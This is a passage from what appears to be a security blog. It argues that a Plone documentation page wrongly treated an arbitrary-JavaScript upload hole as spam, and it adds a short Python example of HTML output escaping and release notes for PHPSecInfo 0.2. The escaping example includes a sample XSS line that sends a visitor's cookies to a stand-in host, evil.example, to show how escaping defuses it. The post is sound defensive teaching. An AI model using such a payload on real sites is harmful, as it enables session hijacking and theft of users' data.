  4. The loss of outreach to academia by MSR does not imply they aren’t still doing research in security issues.

Many of my questions still remain unanswered, including Mr. Nash’s condition….

Do Open Source Devs Get Web App Security?  Does Anybody?

Note: I’ve updated this article after getting some feedback from Alexander Limi.

A colleague of mine who is dealing with Plone, a CMS system built atop Zope, pointed me to a rather disturbing document in the Plone Documentation system, one that I feel is indicative of a much larger problem in the web app dev community.

The document describes a hole (subsequently patched) in Plone that allowed users to upload arbitrary JavaScript.  Apparently no input or output filtering was being done.  Certainly anyone familiar with XSS attacks can see the potential for stealing cookie data, but the article seems to imply this is simply a spam issue:

Clean up link spam

Is this a security hole?
No. This is somebody logging in to your site (if you allow them to create their own users) and adding content that can redirect people to a different web site. Your server, site and content security is not compromised in any way. It’s just a slightly more sophisticated version of comment spam. If you open up your site to untrusted users, there will always be a certain risk that people add content that is not approved. It’s annoying, but it’s not a security hole.

Well, yes, actually, it is a security hole.  If one can place JavaScript on your site that redirects the user to another page, they can certainly place JavaScript on your site that grabs a user’s cookie data and sends it to another site.  Whether or not they’ll get something useful from the data varies from app to app, of course.  My initial reading was that one of Plone’s founders (the byline on this document is for Alexander Limi, whose user page describes him as “one of Plone’s original founders”) did not consider this a security issue; after getting feedback from Alexander Limi, it seems clear that he does understand the user-level security implications of the vulnerability, but was trying to make the distinction that there was no security risk to the Plone site itself.  Still, the language of the document is (unintentionally) misleading, and it’s very reminiscent of the kinds of misunderstandings and excuses I see all the time in open-source web app development.
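To make the mitigation concrete, here is a minimal Python sketch (mine, not Plone’s actual code; render_comment and its inputs are hypothetical) of output escaping, which neutralizes both the redirect and the cookie-theft variants of the attack: user-supplied text is HTML-escaped before it is written into a page, so an injected script tag renders as inert text instead of executing.

```python
# Hypothetical example of output escaping (not Plone's actual fix).
from html import escape

def render_comment(author: str, body: str) -> str:
    # Escape all user-supplied text before embedding it in HTML so that
    # characters like < > " & cannot break out into markup or script.
    return "<div class='comment'><b>{}</b>: {}</div>".format(
        escape(author, quote=True),
        escape(body, quote=True),
    )

if __name__ == "__main__":
    hostile = '<script>document.location="http://evil.example/?c=" + document.cookie</script>'
    print(render_comment("attacker", hostile))
    # The payload is emitted as &lt;script&gt;... and never runs in a browser.
```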

The point here is (believe it or not) not to pick on Plone.  This is a problem prevalent in most open source development (and in closed source dev, from my experience).  People who simply shouldn’t be doing coding are doing the coding—and the implementation and maintenance.

Let’s be blunt: A web developer is not qualified to do the job if he or she does not have a good understanding of web application security concepts and techniques.  Leaders of development teams must stop allowing developers who are weak on security techniques to contribute to their products, and managers need to stop hiring candidates who do not demonstrate a solid secure programming background.  If they continue to do so, they demonstrate a lack of concern for the safety of their customers.

Educational initiatives must be stepped up to address this, both on the traditional academic level and in continuing education/training programs.  Students in web development curriculums at the undergrad level need to be taught the importance of security and effective secure programming techniques.  Developers in the workforce today need to have access to materials and programs that will do the same.  And the managerial level needs to be brought up to speed on what to look for in the developers they hire, so that under-qualified and unqualified developers are no longer the norm on most web dev teams.

 

PHPSecInfo v0.2 now available

PHPSecInfo Screenshot

The newest version of PHPSecInfo, version 0.2, is now available.  Here are the major changes:

  • Added link to “more info” in output.  These lead to pages on the phpsec.org site giving more details on the test and what to do if you have a problem
  • Modified CSS to improve readability and avoid license issue with PHP (the old CSS was derived from the output of phpinfo())
  • New test: PhpSecInfo_Test_Session_Save_Path
  • Added display of “current” and “recommended” settings in test result output
  • Various minor changes and bug fixes; see the CHANGELOG for details

-Download now

-Join the mailing list